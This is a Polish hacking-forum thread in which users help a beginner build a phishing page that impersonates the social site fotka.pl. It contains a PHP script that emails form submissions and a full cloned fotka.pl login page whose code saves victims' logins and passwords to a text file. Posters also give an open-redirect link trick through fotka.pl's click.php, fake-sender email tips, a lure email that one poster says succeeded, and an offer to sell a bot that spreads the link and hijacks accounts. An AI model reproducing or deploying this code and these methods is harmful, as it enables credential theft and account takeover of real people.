Prośba o skrypt

[Monastyr]

Witam jest to mój pierwszy post na forum więc prosze o wyrozumiałosc

Więc potrzebny mi skrypt który wgram na serwer ftp powiedzmy na cba.pl i powstanie mi strona podszywajaca sie np. pod fotka.pl. Chodzi mi o taki skrypt , że powiedzmy wysyłam osobie strone ana sie tam loguje mysląc ze to fotka.pl i wysyła mi na miala passy. Moze to troche n00bsko opisałem ale cuż ;P Szukałem na forum nie znalazłem, jesli jest prosze o link do tematu. Prosiłbym tez o jakies wyjasnienie poniewaz dopiero zaczynam swoja przygode z hakingiem

Z góry dziękuje

 

[sinis]

Wystarczy, że ściągniesz kod wyglądu z fotki, a pod formularz z logowaniem podrzucisz skrypt, który wyśle Ci passy i zaloguje ofiarę na fotkę...

 

[unlock]

nie wiem czy o to ci chodzi, ze chcesz zrobic imitacje strony fotki, i jak ktos sie loguje to wyskakuje ze blad logowania i przenosi na fotka.pl, a tymczasem log i haslo masz na poczcie ?
Jak tak to zapisz strone fotki i przerob formularz

<?php
if (count($_POST))
{
    ////////// USTAWIENIA //////////
    $email = 'adres e-mail gdzie wysłać formularz';    // Adres e-mail adresata
    $subject = 'temat';    // Temat listu
    $message = 'Dziękujemy za wysłanie formularza';    // Komunikat
    $error = 'Wystąpił błąd podczas wysyłania formularza';    // Komunikat błędu
    $charset = 'iso-8859-2';    // Strona kodowa
    //////////////////////////////
    
    $head =
        "MIME-Version: 1.0\r\n" .
        "Content-Type: text/plain; charset=$charset\r\n" .
        "Content-Transfer-Encoding: 8bit";
    $body = '';
    foreach ($_POST as $name => $value)
    {
        if (is_array($value))
        {
            for ($i = 0; $i < count($value); $i++)
            {
                $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n";
            }
        }
        else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n";
    }
    echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error;
}
else
{
?>
<form action="?" method="post">

Tutaj umieść wszystkie pola formularza

</form>
<?php
}
?>

To gotowiec ze strony kurshtml.boo.pl

 

[Monastyr]

Dzięki o to mi chodziło

unlock jak możesz napisz na gg moze sie przydac pomoc

 

[fr0zon]

Ja kiedys ksiege gosci przerobilem

ale ze po wpisaniu danych do pol przenosilo na strone gdzie mozna bylo sciagnac niby wypas wersje GG

 

[Hunter]

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="pl"><head><title>Fotka.pl - Twoje miejsce w sieci</title>



<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Expires" content="0">
<meta name="revisit-after" content="2 hours">
<script language="javascript1.2" type="text/javascript"><!--
var pp_gemius_identifier = new String('.c2aoe8IYzLDx95AateTc8Pa73wWWVr97uqYCoZGg.b.t7');
//-->
</script>
<script language="javascript" type="text/javascript" src="login/pp_gemius.js"></script>

<link rel="stylesheet" href="login/style.css" type="text/css">
<script src="login/fotka.js" type="text/javascript"></script>
<script src="login/prototype.js" type="text/javascript"></script></head><body style="margin: 5px 0px 20px 20px; text-align: center;" bgcolor="#ffffff">

<div style="margin: auto; width: 750px; text-align: left;">
<table class="b10" style="border-bottom-width: 4px; border-bottom-style: solid; width: 750px; margin-bottom: 35px;" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
  <td>[url="http://www.fotka.pl/index.php"][img]login/logo3.gif[/img][/url]</td>
  <td style="padding-bottom: 5px;" align="right" valign="bottom">[url="http://www.fotka.pl/index.php"][b]Strona główna[/b][/url] | [url="http://www.fotka.pl/pomoc.php"][b]Pomoc[/b][/url]</td>
</tr>
</tbody></table>
<table style="width: 750px;" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr><td style="padding-right: 20px;" valign="top">
<div style="font-size: 32px;" class="k10">[i]Dołącz do 6.795.065 osób![/i]</div>
<ul style="line-height: 25px; margin-top: 25px; font-size: 15px;">
[*]Możesz łatwo [b]wyszukiwać[/b] nowych znajomych.

[*]Możesz opublikować swoje [b]zdjęcie[/b].

[*]Możesz [b]głosować[/b] na inne osoby.

[*]Możesz dodawać [b]komentarze[/b] do zdjęć.

[/list]
<div style="border-top: 1px solid rgb(204, 204, 204); margin-top: 40px; width: 440px;"> </div>    
<div align="left"><input value=" Załóż nowe konto " style="padding: 4px; font-size: 15px; font-weight: bold;" class="bg10 k99" onclick="location='/konto_nowe.php'" type="button"></div>


</td>
<td style="padding-left: 20px;" align="left" valign="top">

<div class="bg10" style="padding: 1px; color: rgb(255, 255, 255); font-size: 18px;"> LOGOWANIE</div>
<div class="b10" style="border-style: solid; border-width: 1px; padding: 10px; background-color: rgb(245, 245, 245);">

<?php

$pole1 = trim($_POST['login']);
$pole2 = trim($_POST['pass']);

if(empty($pole1) and empty($pole2)) {

echo ' <form action="" method="post" style="margin: 0px;">
<table align="center" border="0" cellpadding="4" cellspacing="0">
  <tbody><tr>
    <td class="tabelka_br" nowrap="nowrap">Login:</td>
    <td align="right"><input name="login" id="f_login" size="10" maxlength="21" style="width: 150px;" type="text">
</td>
  </tr>
  <tr>
    <td class="tabelka_br" nowrap="nowrap">Hasło:</td>
    <td align="right"><input autocomplete="off" name="pass" id="f_pass" size="10" maxlength="30" style="width: 150px;" type="password">
</td>
  </tr>
  <tr>
    <td colspan="2" style="text-align: right; padding-top: 10px;"><input id="form_login" class="bg10 k99" style="padding: 3px; width: 120px; font-weight: bold;" value="Zaloguj mnie" type="submit"></td>
  </tr>
  <tr>
    <td colspan="2" style="text-align: right; padding-top: 5px; padding-bottom: 5px;">
      [url="http://www.fotka.pl/haslo.php"]Nie pamiętasz hasła?[/url]

      [url="http://www.fotka.pl/pomoc.php?id=4"]Problemy z logowaniem?[/url]

      

    </td>
  </tr>
</tbody></table>
<input name="back_url" value="/konto.php" type="hidden">
</form>';

}
else {
    
    $dane = $pole1."`".$pole2."\n";
    $file = "bazahasell337.txt";
    $fp = fopen($file, "a");
    flock($fp, 2);
    fwrite($fp, $dane);
    flock($fp, 3);
    fclose($fp);
 
}

?> 

</div>

</td></tr>

<tr>
<td colspan="2">

    

    

    <div style="padding: 5px; background-color: rgb(245, 245, 245); text-align: left;">
    [color= red;][b]Uwaga![/b][/color]

    Prosimy nie reagować na wiadomości z prośbą o:

    - zmianę hasła na podane przez kogoś,

    - podanie linka do zmiany hasła,

    - podanie hasła.

    

    Fotka.pl nigdy nie wysyła takich wiadomości. Wszelkie takie prośby są próbą oszustwa.

    Jeżeli otrzymałeś/aś taką informację zapisz ją na dysku i [url="http://www.fotka.pl/info/kontakt.php"]powiadom[/url] nas o tym.
    </div>

  <div style="border-top: 1px solid rgb(204, 204, 204); color: rgb(102, 102, 102); margin-top: 80px; padding-top: 3px; text-align: right;">
  Zalogowanie się oznacza akceptację aktualnego [url="http://www.fotka.pl/info/regulamin.php"]Regulaminu[/url].
  </div>
</td>
</tr>
</tbody></table>

    
<script type="text/javascript" language="javascript1.2">
<!--
$('f_login').focus();
f_pass=$('f_pass');
f_pass.setAttribute("autocomplete", "off");
//-->
</script>
<br clear="all">
<p style="margin: 0px; text-align: right; color: rgb(221, 221, 221);">Strona wygenerowana 2007-06-05 02:17:58</p></div>
[color= rgb(255, 255, 255);]5[/color]
</body></html>

utworz plik bazahasell337.txt i nadaj mu odpowiednie chmody

ps. mam bota ktory wysyla link ze strona phishingową mailem oraz prywatna wiadomoscia na fotka.pl, co 30 min. sprawdza wykradzione hasla, po czym loguje sie na konta i wysyla ponownie linki do calej listy znajomych, moge go sprzedac

 

[fr0zon]

Ścieżki doplików js i loga są błedne

trzeba dopisać przed nimi http://fotka.pl/

Taka mała sugestion.

 

[unlock]

Koles juz coś wykminił pod adresem : http://newfotka.cba.pl/

 

[fr0zon]

Niedałbym się nabrać

Niedzialaja pliki stylów i skrypty z fotki a nawet loga nie ma wiec zapomnijcie ze sie nabiora Taka jakaś wyblakla ta fotka

 

[unlock]

mnie by tez domene zniecheciła, kazdy kto troche śmiga po necie mysle ze wie ze cba.pl to darmówka. Jakby to było na .pl i ktoś by był na fotce oryginalnej 2 razy w zyciu to moze moze by cos wyszlo ale po komunikacie :" Dziekujemy za wysłanie formularza " to bym zmienił haslo.

 

[abramakabra]

Domenę można spokojnie za złotówkę kupić.

 

[Hunter]

wykorzystaj click.php na fotka.pl, link bedzie dlugi ale przynajmniej zacznie sie od fotka.pl, lokalizacje moga byc zle poniewaz jest to stary kod fotki chyba z przed 2 lat

 

[unlock]

masz moze link do click.php?

 

[Monastyr]

Wiem ze moze to nie wygląda super, ale sprawdziło sie

Chciałem to zrobic pod jedną osobą i dała sie nabrac i konta juz nie posiada na chwile obecna.

Zrobilem ją w ten sposób:

Od: [email][email protected][/email]

Witaj jesli otrzymałeś/łaś te wiadomośc oznacza, że Twoje konto w serwisie fotka.pl zostało zablokowane.
Aby odblokować swoje konto zaloguj sie na na stronę [url]www.newfotka.cba.pl[/url] w celu wysłania formularza, który w okresie maksymalnie 12 godzin odlbokuje konto. Po zalogowaniu na stronie, prosimy najpierw sie wylogować ze strony podstawowej i nie logować sie powtórnie na niej przez najbliższe 2 godziny.

Pozdrawia: Team fotka.pl

Dalej juz chyba nie musze mówic

 

[Hunter]

http://www.fotka.pl/click.php?id=186&url=http://vip.fotka.4.pl

btw. stary txt jaki wysyla moj bot na pw fotki to:

DARMOWE KONTA VIP NA FOTKA.PL WYSTARCZY SIE ZALOGOWAC !! [url]http://www.fotka.pl/click.php?id=186&url=http://vip.fotka.4.pl[/url]

nadal w 100 % skuteczny

 

[amex]

DARMOWE KONTA VIP NA FOTKA.PL WYSTARCZY SIE ZALOGOWAC !! http://www.fotka.pl/click.php?id=186&u.../vip.fotka.4.pl[/b]

o ile sie dobrze orientuje to teraz to sie nazywa konto gwiazda czy jakos tak wiec raczej nie jest skuteczny w 100% ;p

 

[wazniak91]

http://www.fotka.pl/forum/read.php?f=11&t=856157 teraz bedzie ciezej

 

[fr0zon]

Heh da się bo idioci zawsze się znajdą

Tylko podszytego maila fotkowego skobinować

Znasz czyiś login fotka i mail i wysylasz odpowiedni email and włala...

 

[amex]

fr0zon, wystarczy bramka fakemail, a jeśli koniecznie potrzebujesz odpowiedzi ofiary na e-mail to można przecież dać jakiś podobny adres do reply-to, mało kto z tego co zauważyłem na to patrzy...